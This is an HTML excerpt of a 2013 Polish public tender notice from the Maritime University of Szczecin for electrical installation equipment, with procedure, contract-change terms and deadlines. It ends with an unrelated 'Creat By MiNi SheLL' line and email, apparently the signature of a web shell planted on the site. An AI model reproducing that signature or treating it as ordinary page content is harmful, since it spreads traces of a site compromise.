6)	Ogranicznik przepięć w klasie B+C (1+2) 3 - bieg. z NPE, Uc = 280 V, z sygnalizacją zadziałania, stykiem 1p, prąd udarowy Iimp = 25 kA, poziom ochrony napięciowej Up < 0,9 kV
7)	Przekładnik pomiarowy w trzech fazach - 3p, na listwę montażową TH - 35 - 125 A  5A, w klasie 0,5.
8)	Przekładnik pomiarowy w klasie 0,5, z otworem na przeplot o średnicy 29 mm - 400 A 5 A, o przeciążalności 1,2 In, na listwę montażową TH - 35, o szerokości 52,5 mm 
9)	Przekładnik prądowy 600  5 w klasie 0,5.
10)	Ręczny przełącznik sieci 4p, 200 A, z blokadą mechaniczną BY - PASS, bezprzerwowy w układzie (I-I + II-II),Ui = 800 V, kat. AC - 22A, Izw = 20 kA. 
11)	Automatyczny przełącznik sieć - sieć  agregat, 125 A  4p, Ui = 800 V, kat. AC - 22A, Izw = 17 kA, Up = 230 VAC, czas przełączenia - 180 ms.
12)	Automatyczny przełącznik sieć - sieć  agregat, 250 A  4p, Ui = 800 V, kat. AC - 22A, Izw = 30 kA, Up = 230 VAC, czas przełączenia - maks.1,3 s.
13)	Rozłącznik bezpiecznikowy wielkości 00 / In = 160 A, Ui = 1 kV, Iz (prąd załączalny Iz = 50 kA), do montażu na szynach 3F - 20 x 5 mm, z nakładką zdalnej sygnalizacji przepalenia wkładek, o obciążalności styków min. In = 8 A.
14)	Odłącznik ręczny In = 800 A / 4p, Ui = 1 kV, Iz (prąd załączalny Iz = 80 kA), kat. AC - 22A
15)	Rozłącznik sekcyjny In = 400 A / 4p, Ui = 1 kV, Iz (prąd załączany Iz = 65 kA), kat.AC - 22A ze stykiem pomocniczym.
16)	Rozłącznik sprzęgłowy In = 500 A / 4p,Ui = 1kV, Izw szcz = min 45 kVA.
17)	Rozłączniki bezpiecznikowe (bez główek bezpiecznikowych) na wkładki DO2, Ui=0,5kV, napięcie udarowe Ud = 8 kV, zdolność zwarciowa Izw=50 kA, kat. AC - 22A.
18)	Rozłączniki bezpiecznikowe (bez główek bezpiecznikowych) na wkładki DO1,                Ui = 0,5 kV, napięcie udarowe Ud = 8 kV, zdolność zwarciowa Izw = 50 kA, kat. AC - 22A.
19)	UPS - 1,5 kVA, 1f  1f - do szaf typu RACK.
20)	Wyłącznik nadprądowy przemysłowy dla sieci TNC - S  In = 125 A  4p, zwarciowa zdolność łączeniowa Izw  25 kA, ze stykiem pomocniczym Sd i OFF, z blokadą na kłódkę.
21)	Wyłącznik kompaktowy In = 250 A, Ui = min. 0,75 kV, Ud = 8 kV, prąd wyłączalny - min. 25 kA, styki SD i OFF, napęd MT - 230 VAC, zabezpieczenia elektroniczne nastawialne, przeciążeniowe, zwarciowe zwłoczne i bezzwłoczne, wyzwalacz wzrostowy.
22)	Wyłącznik kompaktowy In = 630 A, Ui = min. 0,75 kV, Ud = 8 kV, prąd wyłączalny - min. 45 kA, styki SD i OFF, napęd MT - 230 VAC, zabezpieczenia elektroniczne nastawialne przeciążeniowe, zwarciowe zwłoczne i bezzwłoczne, wyzwalacz wzrostowy.
23)	Zestawy montażowe do wykonania muf z rur termokurczliwych na kablach 4 - żyłowych do 1 kV.
24)	Oprawa przemysłowa z odbłyśnikiem asymetrycznym 1x18W  IP - 65.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wzór umowy stanowi zał. nr 8 do SIWZ.
2.Zamawiający informuje, że przewiduje możliwości zmiany umowy. Zmiany zawartej umowy mogą nastąpić w formie aneksu w następujących przypadkach:
1) gdy ulegnie zmianie stan prawny w zakresie dotyczącym realizowanej umowy, który spowoduje konieczność zmiany sposobu wykonania zamówienia przez Wykonawcę;
2) gdy ulegnie zmianie dostęp do nowych technologii, umożliwiających wykonanie przedmiotu zamówienia,
3) gdy nastąpi ustawowa zmiana stawki podatku od towarów i usług VAT, w takim przypadku umowa ulegnie zmianie w zakresie wysokości ceny brutto
4) zmiany wynagrodzenia związane z koniecznością rezygnacji przez Zamawiającego z wykonania części zamówienia o wartość wynikającą z kosztorysu będącego załącznikiem do umowy,
5) wystąpią okoliczności skutkujące potrzebą zmiany terminu realizacji zamówienia takie jak: 
a) brak dostępu do pomieszczeń, w których przewidziano prowadzenie prac z przyczyn niezależnych od Wykonawcy, 
b) brak dostępu do mediów (np. awarie w dostawach energii elektrycznej, wody czy innych mediów niezbędnych do wykonania przedmiotu umowy),
c) opóźnienia w dostawie materiałów i urządzeń zaistniałe z przyczyn kontrahenta (dostawcy), ale nie spowodowane opieszałością Wykonawcy w procesie zamawiania,
d) gdy wystąpią  przeszkody o obiektywnym charakterze (zdarzenia nadzwyczajne, zewnętrzne i niemożliwe do zapobieżenia, a więc mieszczące się w zakresie pojęciowym tzw. siły wyższej) i inne zdarzenia, których przyczyny nie leżą po żadnej ze stron umowy, takie jak: nadzwyczajne zjawiska przyrody (między innymi trzęsienia ziemi, powodzie, huragany), zdarzenia wywołane przez człowieka, np. działania wojenne czy gwałtowne rozruchy oraz akty władzy publicznej (fait du prince), którym należy się podporządkować,
e) wystąpi konieczność wykonania robót dodatkowych.
f) gdy wystąpią inne nie zależne od stron, przyczyny techniczne, których wcześniej nie można było przewidzieć
3. Strony dopuszczają możliwość zmiany terminu przekazania frontu robót z przyczyn niezależnych od Zamawiającego, bez konieczności sporządzania aneksu.
4. Strony dopuszczają możliwość zmian redakcyjnych, omyłek pisarskich oraz zmian będących następstwem zmian danych ujawnionych w rejestrach publicznych bez konieczności sporządzania aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bzp.am.szczecin.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Morska w Szczecinie, Dział Inwestycji i Rozwoju, ul. Wały Chrobrego 1-2, 70-500 Szczecin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.02.2013 godzina 10:30, miejsce: Akademia Morska w Szczecinie, Dział Inwestycji i Rozwoju, ul. Wały Chrobrego 1-2, 70-500 Szczecin.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Otwarcie ofert nastąpi 25.02.2013r. w siedzibie Zamawiającego w Dziale Inwestycji i Rozwoju o godz. 11.00. Wszelkie zmiany terminów dokonane przez Zamawiającego do czasu składania ofert wymagają od Wykonawcy aktualizacji zapisów XIV rozdziału SIWZ. 2.Nr zamówienia nadany przez Zamawiającego AR/10/01/2013. 3. 1.	Realizacja przedmiotu zamówienia nastąpi w terminie: niezwłocznie po podpisaniu umowy i przekazaniu placu budowy (przewidywany termin przekazania placu budowy       11.03.2013r.) maksymalnie do 15.07.2013r. z podziałem na etapy (Uwaga: wykonawca samodzielnie podaje w ofercie termin wykonania zamówienia oraz terminy zakończenia poszczególnych etapów. Terminy podane w niniejszej SIWZ są terminami maksymalnymi). 4.	Z uwagi na fakt, że zachowanie terminu zakończenia robót jest kluczowe dla funkcjonowania uczelni Zamawiający za każdy dzień przekroczenia terminów wykonania danego Etapu oraz terminu zakończenia robót ustala karę umowną                              w wysokości 0,5 % wynagrodzenia umownego brutto za każdy dzień zwłoki, zgodnie 
z zapisami § 11 ust. 1 pkt 2) wzoru umowy - załącznik nr 8 do SIWZ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com